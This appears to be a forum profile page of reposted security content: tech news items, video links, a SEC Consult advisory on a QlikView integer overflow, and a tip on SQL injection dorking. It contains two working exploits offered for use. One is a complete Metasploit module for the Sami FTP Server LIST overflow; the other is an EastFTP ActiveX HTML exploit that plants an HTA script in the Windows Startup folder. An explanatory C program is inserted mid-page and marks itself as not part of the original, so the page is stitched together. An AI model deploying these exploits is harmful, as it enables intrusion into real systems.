Kwelwild

Everything posted by Kwelwild

  1. Sami FTP Server LIST Command Buffer Overflow

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit4 < Msf::Exploit::Remote
      Rank = LowRanking

      include Msf::Exploit::Remote::Ftp

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Sami FTP Server LIST Command Buffer Overflow',
          'Description'    => %q{
            This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1.
            The vulnerability exists in the processing of LIST commands. In order to
            trigger the vulnerability, the "Log" tab must be viewed in the Sami FTP
            Server managing application, in the target machine. On the other hand,
            the source IP address used to connect with the FTP Server is needed. If
            the user can't provide it, the module will try to resolve it. This module
            has been tested successfully on Sami FTP Server 2.0.1 over Windows XP SP3.
          },
          'Platform'       => 'win',
          'Author'         =>
            [
              'superkojiman',                      # Original exploit
              'Doug Prostko <dougtko[at]gmail.com>' # MSF module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'OSVDB', '90815'],
              [ 'BID', '58247'],
              [ 'EDB', '24557']
            ],
          'Privileged'     => false,
          'Payload'        =>
            {
              'Space'          => 1500,
              'DisableNops'    => true,
              'BadChars'       => "\x00\x0a\x0d\x20\x5c",
              'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
            },
          'Targets'        =>
            [
              [ 'Sami FTP Server 2.0.1 / Windows XP SP3',
                {
                  'Ret'    => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll
                  'Offset' => 228
                }
              ],
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Feb 27 2013'))

        register_options(
          [
            OptAddress.new('SOURCEIP', [false, 'The local client address'])
          ], self.class)
      end

      def exploit
        connect

        if datastore['SOURCEIP']
          ip_length = datastore['SOURCEIP'].length
        else
          ip_length = Rex::Socket.source_address(rhost).length
        end

        buf = rand_text(target['Offset'] - ip_length)
        buf << [ target['Ret'] ].pack('V')
        buf << rand_text(16)
        buf << payload.encoded

        send_cmd( ['LIST', buf], false )

        disconnect
      end
    end

    Source: Sami FTP Server LIST Command Buffer Overflow
  2. Kwelwild

    Hi

    If you saw the report on "România te iubesc", I'm telling you it's not exactly an example to follow. You want to get into breaking websites and stealing accounts... after a while it gets boring; learn something that will help you in the future.
  3. Welcome mate!
  4. EastFTP ActiveX Control 0Day

    #################################################################
    #
    # EastFTP ActiveX Control 0Day
    # By: Dr_IDE
    # Vendor Homepage:http://www.ftpocx.com/download.htm
    # Version: 4.6.02
    #
    # Self Promotion: http://irresponsibledisclosure.blogspot.com
    #################################################################

    <html>
    <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target'/></object>
    <script>
    var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
    var king = "><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
    var easy = 1;
    target.LocalFileWrite(sofa,king,easy);
    </script>
    <body>
    EaseFTP ActiveX Control 0-Day Local Exploit<br>
    By: Dr_IDE<br>
    Self Promotion: http://irresponsibledisclosure.blogspot.com<br>
    Vendor Homepage:http://www.ftpocx.com/download.htm<br>
    Version: 4.6.02<br>
    Class FtpLibrary<br>
    GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}<br>
    Number of Interfaces: 1<br>
    Default Interface: _FtpLibrary<br>
    RegKey Safe for Script: False<br>
    RegkeySafe for Init: False<br>
    KillBitSet: False<br>
    </body>
    </html>

    Source: http://www.exploit-db.com/exploits/24863/
  5. Demo: Defeat Ssl-Protection During A Mitm-Attack

    Description: Demo: Defeat SSL-Protection during a MITM-attack
    used tools:
    - sslstrip
    - arpspoof
    Credits: danielhaake.de

    Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

    Original Source:

    Source: Demo: Defeat Ssl-Protection During A Mitm-Attack
  6. http://www.youtube.com/watch?v=oNfHhVwHQUc
  7. Description: By default, VPN is not configured in Kali Linux. If you want to connect to a VPN in Kali Linux, first install pptp and network openvpn in Kali Linux using apt-get install.

    Command:

    apt-get install network-manager-openvpn-gnome
    apt-get install network-manager-pptp
    apt-get install network-manager-pptp-gnome
    apt-get install network-manager-strongswan
    apt-get install network-manager-vpnc
    apt-get install network-manager-vpnc-gnome
    /etc/init.d/network-manager restart

    Original Source:

    Source: Configure Vpn In Kali Linux
  8. Kwelwild

    A suggestion.

    Useful, I'd say (I'd really like to hear Polonic on this)
  9. I'm really interested in what they will show in the report; I'll watch the show too. It seems the guy has changed a lot.
  10. Scandal in the press across the Atlantic: the Anonymous hackers were helped by a Reuters editor to "break" the LA Times website

    Matthew Keys, social media editor at the prestigious news agency Reuters, has been charged with conspiracy together with hackers from the famous organization Anonymous. The name of the Reuters news agency has been pushed into a scandal in which the people at Anonymous are also involved. The hackers were helped by Matthew Keys, an editor at the agency, with the passwords for access to the Tribune Company network. The "betrayal" gave the hackers access to the websites of several publications, and more than once they altered the content of the posted information. It has been shown that the people at Anonymous got into the Los Angeles Times website several times, an employee of the publication producing clear evidence (screenshots) to this effect. It appears that Matthew Keys gave the hackers the access passwords through a chat site, the editor even using the expression "go f**k some shit up". A former employee of a local station in the Fox television network, Keys faces huge fines as well as 10 years in prison. The editor had been working for the Reuters news agency for a year.

    Source: Scandal in the press across the Atlantic: the Anonymous hackers were helped by a Reuters editor to break the LA Times website - www.yoda.ro
  11. Description: Penetration Test MetaSploitable2's DVWA Web Application File Inclusion with Armitage. From RFI to root by http://security-is-just-an-illusion.blogspot.de/2013/03/penetration-test-metasploitable2s-dvwa_14.html

    Original Source:

    Source: http://www.securitytube.net/video/7143
  12. Description: Security researcher Christy Philip Mathew came up with a combination of Clickjacking and CSRF vulnerabilities in Google's Docs that can allow a hacker to create a document in the victim's Drive for a further phishing attack. Hacking Google users with Google's GooPass phishing attack - Hacking News

    Original Source:

    Source: Csrf And Clickjacking : Google Document, Drawing, Forms, Spreadsheet, Presentation
  13. http://www.youtube.com/watch?feature=player_embedded&v=M6j6vSleJbU

    Description: In this video Christy Philip Mathew shows us a demo of Facebook URL Redirection. He reported this vulnerability to Facebook and the issue is fixed, so this demonstration is now safe to learn from: how this attack happened.

    Original Source: Facebook URL Redirection Vulnerability - YouTube

    Source: Facebook Url Redirection Vulnerability
  14. Google fined 7 million dollars for the "intrusion" into private wi-fi networks while working on Street View

    Long on the table and admitted by the fined company, the entry into private wi-fi networks (simply "accidental") while producing the Street View maps has finally been punished. For now only in the United States. The Californian company has to pay, even if the sum is not a "frightening" one for it. The 7 million dollars are far too little for the destruction of emails, passwords and other details of the owners of private wi-fi networks. "Users of technology have every right to protect their personal data from any intrusion. What Google did is a threat to private security, and the law punishes those who obtain confidential information without the owner's permission," said Eric Schneiderman, on behalf of the New York State Court of Justice. Google "accidentally" entered private wi-fi networks between 2008 and 2010, while working on the Street View program. Besides the fine, the company owes apologies to those whose networks were violated, even if, as an official company statement says, "no employee consulted the accidentally collected information".

    Source: Google fined 7 million dollars for the intrusion into private wi-fi networks while working on Street View - www.yoda.ro
  15. http://www.youtube.com/watch?feature=player_embedded&v=KRlUhrWi7Lc

    Description: This quick video shows you how to protect your site against SQLi, XSS and common threats by using Exploit Pack. More info at: Exploit Pack - Security tools

    Original Source: [Exploit Pack] - Protection against SQLi , XSS and more! - YouTube

    Source: [Exploit Pack] - Protection Against Sqli , Xss And More!
  16. Description: Penetration Test MetaSploitable2's DVWA Web Application Command Injection with Armitage. More Inf0s on: http://security-is-just-an-illusion.blogspot.de/2013/03/penetration-test-metasploitable2s-dvwa.html

    Original Source:

    Source: http://www.securitytube.net/video/7134
  17. An integer overflow vulnerability exists in the .qvw file format parser in QlikView Desktop Client version 11.00 SR2. A parameter that is responsible for the section length is checked improperly, which causes a heap overflow if any value bigger than 0x80000000 is set. Successful exploitation of this vulnerability could result in an arbitrary code execution within the QlikView Desktop client.

    SEC Consult Vulnerability Lab Security Advisory < 20130313-0 >
    =======================================================================
                  title: QlikView Desktop Client Integer Overflow
                product: QlikView Desktop Client
     vulnerable version: 11.00 SR2
          fixed version: 11.20 SR1
                    CVE:
                 impact: High
               homepage: http://www.qlikview.com/
                  found: 2012-10-22
                     by: A. Antukh, M. Lucinskij
                         SEC Consult Vulnerability Lab
                         https://www.sec-consult.com
    =======================================================================

    Vendor description:
    -------------------
    "QlikView is a new kind of business intelligence software that changes
    your world. Its BI software that lets you stop guessing and start knowing
    how to make faster, smarter decisions."

    Source: http://www.qlikview.com/us/explore

    Vulnerability overview/description:
    -----------------------------------
    An integer overflow vulnerability exists in the .qvw file format parser.
    A parameter that is responsible for the section length is checked
    improperly, which causes a heap overflow if any value bigger than
    0x80000000 is set. Successful exploitation of this vulnerability could
    result in an arbitrary code execution within the QlikView Desktop client.

    Vulnerability details:
    ----------------------
    The .qvw file is divided into several sections with a specified delimiter.
    Among others, there is a parameter which is responsible for defining the
    section length. On the hex listing below it's the DWORD A4 00 00 00
    (address 315EF)

    000315B0: 00 00 01 00-00 00 0E 23-23 23 23 23-23 23 23 23
    000315C0: 23 23 23 23-23 01 2E 00-00 00 00 00-00 00 00 00
    000315D0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 03
    000315E0: 00 00 00 00-00 00 00 90-02 00 00 00-00 04 00 A4
    000315F0: 00 00 00 78-9C 3D CC CB-4A 02 50 14-86 D1 1F 47

    If for any reason the value is bigger than the actual size of the section,
    an error is handled by a C++ EH and a message "Document failed to load" is
    shown. The check condition can be seen here:

    .text:00D6BD66 mov eax, [edi+28h]
    .text:00D6BD69 mov ebx, [eax]          ; here is the length parameter
    .text:00D6BD6B add eax, 4
    .text:00D6BD6E mov [edi+28h], eax
    .text:00D6BD71 cmp ebx, [ebp+var_14]
    .text:00D6BD74 jg  loc_D6BBAC          ; check if the parameter value is bigger than actual length

    However, the comparison operates with a signed number and doesn't check if
    it's less than zero. In other words, if an attacker supplies a DWORD bigger
    than 0x80000000, the jump will not be taken (as the number will be
    considered as negative), causing an integer overflow. After that, the
    length parameter is used as the DstSize argument to the CArchive::Read
    function:

    .text:00D6BD7A mov eax, [ebp+Dst]
    .text:00D6BD7D push ebx                ; DstSize
    .text:00D6BD7E push eax                ; Dst
    .text:00D6BD7F mov ecx, edi
    .text:00D6BD81 call ?Read@CArchive@@QAEIPAXI@Z ; CArchive::Read(void *,uint)

    A large amount of data is read. It is used later to fill the created
    Archive whose size is 0x8000:

    .text:00B26207 push 0
    .text:00B26209 push 8000h
    .text:00B2620E push 1
    .text:00B26210 lea eax, [ebp+var_60]
    .text:00B26213 push eax
    .text:00B26214 lea ecx, [ebp+var_A8]
    .text:00B2621A call ??0CArchive@@QAE@PAVCFile@@IHPAX@Z ; CArchive::CArchive(CFile *,uint,int,void *)

    This results in the controlled address being overwritten with the
    controlled value.

    .text:009F3092 mov ecx, [esi]
    .text:009F3094 mov edx, [esi+4]
    .text:009F3097 mov [ecx+4], edx        ; here the error occurs;
    .text:009F3097                         ; trying to write at non-existing address

    An extract from a debugger with the occurrence of the error is presented
    below.

    eax=04735f14 ebx=00000000 ecx=bbbbbbb7 edx=aaaaaaa6 esi=04b2fbc0 edi=04735f10
    eip=01723097 esp=003527f8 ebp=00352818 iopl=0         nv up ei pl nz ac pe nc
    cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
    Qv+0x5f3097:
    01723097 895104          mov     dword ptr [ecx+4],edx ds:002b:bbbbbbbb=????????

    Vulnerable / tested versions:
    -----------------------------
    The vulnerability has been verified to exist in QlikView 11.00 SR2, which
    was the most recent version at the time of discovery.

    Vendor contact timeline:
    ------------------------
    2012-11-08: Contacted vendor through support@qlikview.com
    2012-11-12: Initial vendor response - issue will be verified
    2012-12-13: Vulnerability is confirmed and reproduced by the vendor
    2013-03-06: Vendor releases patch / new version
    2013-03-13: Coordinated disclosure

    Solution:
    ---------
    Update to QlikView 11.20 SR1

    Workaround:
    -----------
    None

    Advisory URL:
    -------------
    https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    SEC Consult Unternehmensberatung GmbH
    Office Vienna
    Mooslackengasse 17
    A-1190 Vienna
    Austria
    Tel.: +43 / 1 / 890 30 43 - 0
    Fax.: +43 / 1 / 890 30 43 - 25
    Mail: research at sec-consult dot com
    https://www.sec-consult.com
    http://blog.sec-consult.com

    EOF A. Antukh / @2013

    Source: QlikView Desktop Client 11.00 SR2 Integer Overflow - Packet Storm
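The signed-versus-unsigned length check that the advisory above describes, as an added example that is not part of the original post and not QlikView's code: a constructed section header of the form [len:4][data] is validated first with the signed comparison the disassembly shows (`cmp`/`jg`), then with an unsigned comparison, so the reader can see why a DWORD of 0x80000001 slips through the first and is rejected by the second. Function names, the header layout and the sample bytes are assumptions made for the demonstration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the check described in the advisory. This is added
 * illustrative code, not QlikView's parser: a section header carries a
 * 32-bit length that is compared against the bytes actually available. */

/* Vulnerable form: the comparison is signed ("cmp ebx, [ebp+var_14]; jg"),
 * so a DWORD >= 0x80000000 reads as negative and is never "greater". */
int length_ok_signed(uint32_t section_len, uint32_t remaining)
{
    int32_t len = (int32_t)section_len;
    int32_t avail = (int32_t)remaining;
    return (len > avail) ? 0 : 1;   /* 0 = "Document failed to load" path */
}

/* Fixed form: an unsigned comparison; a huge length cannot pass as negative. */
int length_ok_unsigned(uint32_t section_len, uint32_t remaining)
{
    return (section_len > remaining) ? 0 : 1;
}

/* Little-endian DWORD at off; returns 0 when fewer than 4 bytes remain. */
int read_le32(const uint8_t *buf, size_t buf_len, size_t off, uint32_t *out)
{
    if (off > buf_len || buf_len - off < 4) return 0;
    *out = (uint32_t)buf[off] | ((uint32_t)buf[off + 1] << 8) |
           ((uint32_t)buf[off + 2] << 16) | ((uint32_t)buf[off + 3] << 24);
    return 1;
}

/* Parses a constructed header [len:4][data] with the supplied check.
 * Returns -1 when the header is rejected, otherwise the declared length
 * that the check accepted. The copy is clamped to what both the input and
 * the destination hold so the demo itself stays memory-safe; the real
 * parser passed the accepted length straight to CArchive::Read. */
long long parse_section(const uint8_t *buf, size_t buf_len,
                        int (*check)(uint32_t, uint32_t),
                        uint8_t *dst, size_t dst_len)
{
    uint32_t len;
    if (!read_le32(buf, buf_len, 0, &len)) return -1;
    uint32_t remaining = (uint32_t)(buf_len - 4);
    if (!check(len, remaining)) return -1;

    size_t n = len;
    if (n > remaining) n = remaining;
    if (n > dst_len) n = dst_len;
    memcpy(dst, buf + 4, n);
    return (long long)len;
}

int main(void)
{
    /* Constructed headers: a sane 4-byte section and one declaring 0x80000001. */
    const uint8_t sane[] = { 0x04, 0x00, 0x00, 0x00, 'a', 'b', 'c', 'd' };
    const uint8_t huge[] = { 0x01, 0x00, 0x00, 0x80, 'a', 'b', 'c', 'd' };
    uint8_t out[16];

    printf("sane, signed check:   %lld\n",
           parse_section(sane, sizeof sane, length_ok_signed, out, sizeof out));
    printf("sane, unsigned check: %lld\n",
           parse_section(sane, sizeof sane, length_ok_unsigned, out, sizeof out));
    printf("huge, signed check:   %lld\n",
           parse_section(huge, sizeof huge, length_ok_signed, out, sizeof out));
    printf("huge, unsigned check: %lld\n",
           parse_section(huge, sizeof huge, length_ok_unsigned, out, sizeof out));
    return 0;
}
```

The signed path accepts the 0x80000001 header (and would hand that value on as a read size), while the unsigned path rejects it; the additional clamp to the destination size is the second guard a fixed parser should keep regardless of the comparison, since the advisory's archive buffer was a fixed 0x8000 bytes.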
  18. Csaw Ctf 2011 Qualification Round Challenges

    Description: In this video Derek Thomas (@DerekSThomas) shows us solutions for the CSAW CTF 2011 Qualification Round Challenges. Derek is a Security Consultant and Security Practitioner.

    Original Source:

    Source: Csaw Ctf 2011 Qualification Round Challenges
  19. Owasp Detroit: Covert Channels And Controls In .Net

    Description: In this video J Wolfgang Goerlich talks at OWASP Detroit. Some Stories: Story Overview, Demonstration, Some code as applicable, Note for the attacker, Note for the defender, Q&A

    Original Source:

    Source: Owasp Detroit: Covert Channels And Controls In .Net
  20. Google Reader disappears on July 1. Users have launched a petition to save the RSS reader

    Google is doing its spring cleaning. Several services will disappear. The Google Reader application, which lets you read RSS feeds, will disappear starting July 1, 2013. Users all over the world are being notified right now. The news was not received very well, and there are now several petitions on the Internet to save this service. Since its launch in 2005, Google Reader has not changed much. The reason Google has decided to drop it is the declining number of users. The announcement was made by Urs Holzle, senior vice president Technical Infrastructure. This application allowed users to access their favorite news sites and blogs from a single interface. The look is similar to that of an email inbox. Competing applications, such as FlipBoard or Pulse, are, however, much more visual. "We launched Google Reader in 2005 in an effort to make it easy for people to discover and keep track of their favorite websites. While the product has a loyal following, over the years usage has declined. So, on July 1, 2013, Google Reader will be retired," Holzle said in a blog post. Users can export their data, including site subscriptions, through Google Takeout. One of the users' petitions has so far gathered a few thousand signatures. A video clip with Hitler on this subject has also appeared on YouTube:

    Source: Google Reader disappears on July 1. Users have launched a petition to save the RSS reader - www.yoda.ro
  21. Kwelwild

    Hi

    I haven't done anything in C++ so far.
  22. Firefox blocks cookies from outside the browser and the visited site

    A Stanford student and an online security activist have helped Firefox reach Safari's level: eliminating cookies that have no connection to the browser or to the site the user is on. Firefox, a fervent defender of the "Do Not Track" idea (under which advertising agencies are obliged not to 'follow' those who browse the internet), is one of the 22 browsers that will block cookies coming from "third parties" (from outside the software or the visited site). The change was made thanks to the efforts of a student and an online security activist. The cookie, an electronic "device" that allows the collection of information about the user of a given site, will be blocked by a "patch" produced by Jonathan Mayer, a well-known activist in the field of internet security and a student at the prestigious Stanford. The advertising world says this "patch" is like "a nuclear attack". The advertisers' fear need not be very great, given that Safari has been blocking cookies from outside the browser and the visited site for more than 10 years, and everything... carries on, for internet users as well as for those in the advertising industry.

    Source: Firefox blocks cookies from outside the browser and the visited site - www.yoda.ro
  23. Kwelwild

    Hi

    There were name mix-ups and yes, it's me (just so people know; I'm not hiding).
  24. Put the dork without "inurl:", just (php?id=). //EDIT For the scanner to work you need to put GoogleSearchAPI.dll in the folder with SQLidot.exe